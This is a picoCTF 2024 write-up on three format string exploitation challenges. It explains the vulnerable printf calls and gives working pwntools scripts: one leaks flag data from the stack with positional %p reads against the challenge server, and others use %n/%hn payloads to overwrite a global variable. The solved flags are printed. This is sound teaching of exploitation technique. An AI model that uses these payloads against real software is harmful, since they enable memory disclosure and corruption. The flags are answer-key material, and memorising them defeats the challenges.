Format Strings

This writeup will go over all the format string challenges that were included in the picoctf competition of 2024. I will provide a manual and automated solve for each level and try to give an in-depth explanation.

Thankfully, for all the challenges source code is provided. This will make it easier to focus on what the actual exploitation is.

Format String 0

Jumping into the source code lets checkout what our win condition will be:

1
2
3
4
5
void sigsegv_handler(int sig) {
printf("\n%s\n", flag);
fflush(stdout);
exit(1);
}

Okay so we know that in order to get the flag printed, we need to get the program to segfault. Let’s check out main.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
int main(int argc, char **argv){
FILE *f = fopen("flag.txt", "r");
if (f == NULL) {
printf("%s %s", "Please create 'flag.txt' in this directory with your",
"own debugging flag.\n");
exit(0);
}

fgets(flag, FLAGSIZE, f);
signal(SIGSEGV, sigsegv_handler);

gid_t gid = getegid();
setresgid(gid, gid, gid);

serve_patrick();

return 0;
}

So for the most part here we can see that the program is essentially setting up and reading in the flag. After that it’s calling serve_patrick.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
void serve_patrick() {
printf("%s %s\n%s\n%s %s\n%s",
"Welcome to our newly-opened burger place Pico 'n Patty!",
"Can you help the picky customers find their favorite burger?",
"Here comes the first customer Patrick who wants a giant bite.",
"Please choose from the following burgers:",
"Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe",
"Enter your recommendation: ");
fflush(stdout);

char choice1[BUFSIZE];
scanf("%s", choice1);
char *menu1[3] = {"Breakf@st_Burger", "Gr%114d_Cheese", "Bac0n_D3luxe"};
if (!on_menu(choice1, menu1, 3)) {
printf("%s", "There is no such burger yet!\n");
fflush(stdout);
} else {
int count = printf(choice1);
if (count > 2 * BUFSIZE) {
serve_bob();
} else {
printf("%s\n%s\n",
"Patrick is still hungry!",
"Try to serve him something of larger size!");
fflush(stdout);
}
}
}

So after checking this function out we can see that our goal here is to reach serve_bob. In order to do that we need to get printf to print out more than 2 * BUFSIZE characters. In the code we can see that BUFSIZE is equal to 32. Now obviously none of the options inside of the menu that we can choose has a length greater than 64. But we can also see here that since printf is succeptible to a format string injection, when attempting to printf("Gr%114d_Cheese"), it actually tries to print out an integer with the width of 114. This is because the %d identifier, when not given a argument inside of printf, will reach for a pointer of the stack and print that out in the format we specified.

Let’s check this out in the program:

1
2
3
4
5
6
7
8
9
Welcome to our newly-opened burger place Pico 'n Patty! Can you help the picky customers find their favorite burger?
Here comes the first customer Patrick who wants a giant bite.
Please choose from the following burgers: Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe
Enter your recommendation: Gr%114d_Cheese
Gr 4202954_Cheese
Good job! Patrick is happy! Now can you serve the second customer?
Sponge Bob wants something outrageous that would break the shop (better be served quick before the shop owner kicks you out!)
Please choose from the following burgers: Pe%to_Portobello, $outhwest_Burger, Cla%sic_Che%s%steak
Enter your recommendation:

Here you can see that the program printed out that pointer it could reach, and it printed with padding in order to reach that 114 byte width.

Now an important thing to see here is that in our next options, we have a option that uses the %s format specifier. If this is chosen without an argument given in printf, like it is in this program, we can very easy cause the program to crash if it tries to dereference something it cannot. For example, if the second pointer it reaches on the stack is NULL, dereferencing a null ptr will cause the program to crash, giving us our flag.

Here’s that code segment that shows printf without any arguments:

1
2
3
4
5
6
7
8
9
10
char choice2[BUFSIZE];
scanf("%s", choice2);
char *menu2[3] = {"Pe%to_Portobello", "$outhwest_Burger", "Cla%sic_Che%s%steak"};
if (!on_menu(choice2, menu2, 3)) {
printf("%s", "There is no such burger yet!\n");
fflush(stdout);
} else {
printf(choice2);
fflush(stdout);
}

So let’s send that into the program and see what we get.

1
2
3
4
5
Sponge Bob wants something outrageous that would break the shop (better be served quick before the shop owner kicks you out!)
Please choose from the following burgers: Pe%to_Portobello, $outhwest_Burger, Cla%sic_Che%s%steak
Enter your recommendation: Cla%sic_Che%s%steak
ClaCla%sic_Che%s%steakic_Che(null)
picoCTF{7h3_cu570m3r_15_n3v3r_SEGFAULT_dc0f36c4}

There we can see that we have successfully gotten the program to segmentation fault and retrieved our flag.

Format String 1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
int main() {
char buf[1024];
char secret1[64];
char flag[64];
char secret2[64];

// Read in first secret menu item
FILE *fd = fopen("secret-menu-item-1.txt", "r");
if (fd == NULL){
printf("'secret-menu-item-1.txt' file not found, aborting.\n");
return 1;
}
fgets(secret1, 64, fd);
// Read in the flag
fd = fopen("flag.txt", "r");
if (fd == NULL){
printf("'flag.txt' file not found, aborting.\n");
return 1;
}
fgets(flag, 64, fd);
// Read in second secret menu item
fd = fopen("secret-menu-item-2.txt", "r");
if (fd == NULL){
printf("'secret-menu-item-2.txt' file not found, aborting.\n");
return 1;
}
fgets(secret2, 64, fd);

printf("Give me your order and I'll read it back to you:\n");
fflush(stdout);
scanf("%1024s", buf);
printf("Here's your order: ");
printf(buf);
printf("\n");
fflush(stdout);

printf("Bye!\n");
fflush(stdout);

return 0;
}

Okay, after reading through this source code theres two important things that you need to know. The flag is being read in and stored on the stack at the beginning of the function:

1
2
3
4
5
6
7
8
char flag[64];
...
fd = fopen("flag.txt", "r");
if (fd == NULL){
printf("'flag.txt' file not found, aborting.\n");
return 1;
}
fgets(flag, 64, fd);

This is important because with printf we can leak values off of the stack. The other thing to notice is that we have a vulnerable printf:

1
2
3
scanf("%1024s", buf);
printf("Here's your order: ");
printf(buf);

So knowing that, there is a few ways we can approach leaking the flag off of the stack. We can use a number of different specifiers to achieve this. I will be using %p. The way that works is that it will print out the value that it reached as if it was a pointer, for example: 0x7fff31432100. Another thing thats cool is that we can use positional arguments with this specifier. We can say %10$p to reach the 10th index of the pointers it can reach. This would be the same as writing 10 %ps into the program, except we aren’t also getting the 1-9 pointers.

I have scripted the insertion of this position argument to iterate through the first 100 pointers to see if we can leak the flag.

1
2
3
4
5
6
7
8
9
10
from pwn import *
context.log_level = 'error'

for i in range(1, 100):
p = remote('mimas.picoctf.net', 61533)
p.sendline('%{}$p'.format(i).encode())
p.recvuntil(b'\n')
res = p.recvuntil(b'\n', drop=True)
print(res)
p.close()

So here we set up a connection using pwntools and retrieve the pointers from 1-100. After getting the pointers, everything that was reachable on the stack is printed out in hex. We will look for something that looks like pico, or 0x6f636970 in little endian hex.

1
2
3
4
5
6
7
8
b"Here's your order: (nil)"
b"Here's your order: 0x7b4654436f636970"
b"Here's your order: 0x355f31346d316e34"
b"Here's your order: 0x3478345f33317937"
b"Here's your order: 0x35625f673431665f"
b"Here's your order: 0x7d663839623764"
b"Here's your order: 0x7"
b"Here's your order: 0x738c3d56d8d8"

In this segment here we can see that little endian ‘pico’ at the right side of the first big pointer we see. Extracing these and decoding from hex as well as swapping the endianness, we get picoCTF{4n1m41_57y13_4x4_f14g_b5d7b98f}.

Format String 2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
int sus = 0x21737573;

int main() {
char buf[1024];
char flag[64];


printf("You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?\n");
fflush(stdout);
scanf("%1024s", buf);
printf("Here's your input: ");
printf(buf);
printf("\n");
fflush(stdout);

if (sus == 0x67616c66) {
printf("I have NO clue how you did that, you must be a wizard. Here you go...\n");

// Read in the flag
FILE *fd = fopen("flag.txt", "r");
fgets(flag, 64, fd);

printf("%s", flag);
fflush(stdout);
}
else {
printf("sus = 0x%x\n", sus);
printf("You can do better!\n");
fflush(stdout);
}

return 0;
}

This challenge ramps up the difficulty a little more, but the same concepts apply. After the last challenge we discovered that we can read some values off the stack, and if you were paying attention when doing it you might’ve noticed that our input is also stored onto the stack, which will be important later.

So the win condition of this challenge is that we need sus to be equal to 0x67616c66, which we can see it obviously isnt. We need to change that. You might be asking how, but let me set up explain some important things first.

1
2
3
4
5
Arch:       amd64-64-little  
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)

Running checksec on the binary, we see that the binary does NOT have PIE. If you are not familiar with it, it stands for Position Independent Executable. It is a security measure that enables executables to be loaded at random memory addresses. When this is not enabled, we have the exact location of global variables, functions, and more within the binary.

Something else you’ll want to be familiar with for this challenge is the %n format specifier. It is used to write to a memory address. Recall those pointers that we were printing off the stack inside the Format String 1. If we were to use %n it would dereference the pointer that is currently within reach (or provided as an argument) and from there would write x amount of bytes to it, x being the number of bytes printed beforehand by the current printf call. So if we did AA%n inside of printf, it would print two bytes to the pointer that is dereferenced.

How does that help us write to sus? Well, if we can dereference the address of sus on the stack, then we can write to it. We can place that address of the stack by using it in our input like so:

1
2
3
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
AAAAAAAA%14$p
Here's your input: AAAAAAAA0x4141414141414141

Manual Solve

Here we can see that our input starts at offset 14. So if we were to write the bytes that equal to the address of sus we can then do something like %14$n to write to it. Now in order to get the right value of bytes to write to the address we can use %x which when given a number in the middle like %10x will print 10 bytes.

Here is the simplest script I have written to demonstrate:

1
2
3
4
5
6
7
8
9
10
from pwn import *
bin = 'vuln'
elf = context.binary = ELF(bin)
p = process(bin)

#address of sus to dereference
sus = elf.sym['sus']
payload = b'%000000008x%16$n' + p64(sus)
p.sendline(payload)
p.interactive()

Yielding:

1
2
3
4
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: 00402075`@@
sus = 0x8
You can do better!

So as you can see we have successfully change the value of sus. Now i’ll explain how the payload worked. The first 16 bytes we wrote will take up pointers 14 and 15 as each are 8 bytes, and then the 16th offset will be the address of sus. Using %8x we were able to write 8 bytes to it, the zero’s being used for padding. So now we can continue with our goal to write 0x67616c66 to sus. Now we need to write that many bytes, which is 1734437990. Now this would take a considerable amount of time to print, so what we can do is use multiple writes to do two writes instead of one. Breaking it up into 0x6761 and 0x6c66.

Here’s the script doing that:

1
2
3
4
5
6
7
8
9
10
from pwn import *
bin = 'vuln'
elf = context.binary = ELF(bin)
p = process(bin)

#address of sus to dereference
sus = elf.sym['sus']
payload = b'%26465x%18$nAAAA' b'%1281x%19$hnAAAA' + p64(sus+2) + p64(sus)
p.sendline(payload)
p.interactive()

Now to explain this one. When we write we cannot go backwards with how many bytes we have already written with printf (cannot decrease written bytes), therefor we need to write the smaller of the two first so we can write the larger next. So 0x6761 and 0x6c66 translate to 26465 and 27750 respectively. Doing some quick math 27750 - 26465 = 1285. So if we write the first part, all we need to write after that is 1285 more bytes. Now you might be looking at my payload and wondering why I am writing 1281. That is because of these padding bytes AAAA which take up 4 bytes, therefor reducing our number by 4.

Another thing to note about the payload is I am writing the upper bytes first, so I am offseting the writing address by 2 bytes, making it write to the upper bytes slot. After than I am using specifier %hn to only write to bytes. You can find more information about specifics on format specifiers here. This is useful because now instead of overwriting the other bytes we already wrote it will only effect the first two bytes at sus, which are the lower bytes we are missing.

Automated Solve

Now that we have learned how to do it manually, I will show how easily pwntools can handle this exploit:

Script:

1
2
3
4
5
6
7
8
9
10
from pwn import *
bin = 'vuln'
elf = context.binary = ELF(bin)
p = process(bin)

#address of sus to dereference
sus = elf.sym['sus']
payload = fmtstr_payload(14, {sus : 0x67616c66})
p.sendline(payload)
p.interactive()

Running the solve:

1
2
I have NO clue how you did that, you must be a wizard. Here you go...
picoCTF{f0rm47_57r?_f0rm47_m3m_99fd82cd}